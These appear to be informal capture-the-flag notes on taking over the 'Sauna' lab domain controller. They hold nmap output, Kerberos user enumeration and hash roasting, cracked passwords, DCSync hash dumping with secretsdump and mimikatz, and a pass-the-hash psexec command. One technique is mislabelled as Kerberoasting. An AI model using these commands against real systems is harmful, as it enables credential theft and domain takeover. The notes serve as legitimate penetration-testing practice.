NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-05 08:47:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
/images (Status: 301) [Size: 150] [--> http://10.10.10.175/images/]
/index.html (Status: 200) [Size: 32797]
/css (Status: 301) [Size: 147] [--> http://10.10.10.175/css/]
/contact.html (Status: 200) [Size: 15634]
/blog.html (Status: 200) [Size: 24695]
/about.html (Status: 200) [Size: 30954]
/. (Status: 200) [Size: 32797]
/fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/fonts/]
/single.html (Status: 200) [Size: 38059]
Names on domain
Fergus Smith
Shaun Coins
Bowie Taylor
Hugo Bear
Sophie Driver
Steven Kerb
We can use a script to make all possible username combos from this list. Then use GetNPUsers to see who we can kerberos
create a user list and name it user.txt
python3 userlistcreator.py
./kerbrute_linux_amd64 userenum user.txt -d EGOTISTICAL-BANK.LOCAL --dc
10.10.10.175
fsmith is a valid login
Kerberoasting attack
python3 GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -dc-ip 10.10.10.175 -outputfile hashes.txt -no-pass -format hashcat -usersfile fsmith.txt
hash
[email protected]:6808caa9cbe41ae51ff8f8f7abbbbab7$ecf562617c21761ad3c9f05cf6ba05661b80ac3639d7ed328c2dd12c8c2f6cd7a827a11bcdc89cc68d8835eb31e5b0398be5f3cb49fcfae114695b5b6d33db8166fe8aaaceec84da27557a12cc31e21a648171ff7024549affca3e73f4108b9df1f0b0c1c00b0e5d7a0d2f1961195e77e27d5401f8298e7e1b86170ec59b59388ef87b2ff1725fb9beff55c539bbe3cf60b850fad7793fc8d25199812f25a0faab8c43350f2c9ddbb3b7f229b166f0a159ca50cdddf1f23564cd3126629dbf77334eb9f40b48c1bd48cac8da6617ab9149605cb02848b7cb7c49c6ae16f5889505fffbdbef8680cc193db314cf7cd9d4fdbe0ec42507175051a0b7bc62d8f023
hash cracks to Thestrokes23
fsmith:Thestrokes23
Found creds for svc_loanmanager
DefaultUserName : EGOTISTICALBANK\svc_loanmgr
DefaultPassword : Moneymakestheworldgoround!
I had to cheat for this part as bloodhound would not work for me. But we have GetChanges and GetChangesAll and bloodhound shows us how to exploit this.
we can dump hashes of the admin with these commands
secretsdump.py 'svc_loanmgr:[email protected]'
hash with secretsdump
aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
hash with mimikatz
d9485863c1e9e05851aa40cbb4ab9dff
Pass the hash attack
impacket-psexec egotistical-bank.local/[email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e"
